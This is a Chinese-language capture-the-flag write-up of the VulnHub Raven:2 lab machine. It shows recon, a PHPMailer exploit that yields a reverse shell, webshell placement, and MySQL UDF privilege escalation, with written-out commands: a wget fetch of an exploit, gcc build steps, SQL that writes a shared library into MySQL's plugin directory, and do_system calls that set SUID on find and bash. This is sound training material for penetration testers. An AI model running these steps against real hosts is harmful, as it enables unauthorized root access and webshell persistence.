vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)

镜像下载:Raven: 2 ~ VulnHub

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第1张图片

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第2张图片

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第3张图片

实验环境:kali:192.168.78.128

                   vulnhub镜像:192.168.78.133

1、kali查看本地ip地址,以便使用nmap扫描ip段存活主机

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第4张图片

2、nmap扫描IP段,发现靶机的IP地址为192.168.78.133

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第5张图片

4、访问http:192.168.78.133/

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第6张图片

 5、使用gobuster扫描目录,发现存在vendor目录,且发现靶机使用的是phpmailer

 vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第7张图片

 6、发现vendor

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第8张图片

7、发现第一个flag,并且网站的路径为/var/www/html/vendor/

flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第9张图片

8、发现phpmailer版本为5.2.16

 vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第10张图片

9、去exp官网查询漏洞情况

        网站为:https://www.exploit-db.com/

 vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第11张图片

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第12张图片

10、下载exp

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第13张图片

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第14张图片

这里如果始终报错,不出现shell的URL地址时,请在python脚本开头加入如下代码
#!/usr/bin/python

# -*- coding: utf-8 -*-

11、当访问shell的URL时,shell反弹到主机

 vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第15张图片

12、查看目录

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第16张图片

13、查询flag文件

/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png

/var/www/flag2.txt

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第17张图片

 vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第18张图片

 vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第19张图片

 vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第20张图片

 14、cat wp-config.php,在配置文件中发现了mysql账号密码

 vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第21张图片

 15、写入一句话木马,使用蚁剑连接

echo '> 1.php

使用bash命令:python -c 'import pty;pty.spawn("/bin/bash")'

 

 16、连接shell的时候遇到一个问题,哥斯拉可以连接成功,冰蝎连接失败,换个冰蝎的shell脚本才能连接,一句话木马只能使用哥斯拉和蚁剑连接。

 vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第22张图片

 选择冰蝎专用shell脚本

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第23张图片

 密码为x的webshell


vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第24张图片

 17、利用mysql数据库提权

(1)连接数据库

 vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第25张图片

 (2)发现数据库没开启外链,使用sql语句开启外链

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第26张图片

 (3)利用navict连接数据库,发现连接失败,怀疑防火墙禁止外链

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第27张图片

 (4)MDUT 2.0 数据库利用工具  https://github.com/SafeGroceryStore/MDUT  

利用冰蝎内网穿透,内网mysql出来连接我

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第28张图片

连接成功之后进行UDF提权

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第29张图片

查看root目录下的文件,发现存在第四个flag

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第30张图片

 以下是两个手工提权的手法。分别是find、bash提权

18、利用exp手工提权,将find命令赋予suid权限,使用find的exec执行命令

 (1)通过mysql账号密码,登录进入mysql,看看数据库的版本是否存在漏洞

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第31张图片

 (2)查看版本

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第32张图片

 (3)exp:

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) - Linux local Exploit我们在KALI上编译生成so文件

wget https://www.exploit-db.com/download/1518

mv 1518 raptor_udf.c

gcc -g -c raptor_udf.c

gcc -g -shared -o raptor_udf.so raptor_udf.o -lc

mv raptor_udf.so 1518.so

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第33张图片

(4)将输出的1518.so上传到靶机的/tmp,进行提权,进入mysql数据库中导入

use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/1518.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';

创建do_system函数调用

create function do_system returns integer soname '1518.so';

select do_system('chmod u+s /usr/bin/find');

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第34张图片

#配合使用find调用执行

touch dafei

find dafei –exec "whoami" \;

find dafei –exec "/bin/sh" \;

id

 vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第35张图片

19、bash提权

(1)查看bash命令的目录

(2)mysql中导入脚本,新增/usr/lib/mysql/plugin/1518.so

use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/1518.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';

创建do_system函数调用

create function do_system returns integer soname '1518.so';

select do_system('chmod u+s /bin/bash');

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第36张图片

vulnhub-RAVEN:2(MYSQL-UDF提权,手工提权/工具自动提权)_第37张图片

你可能感兴趣的:(数据库,php,开发语言)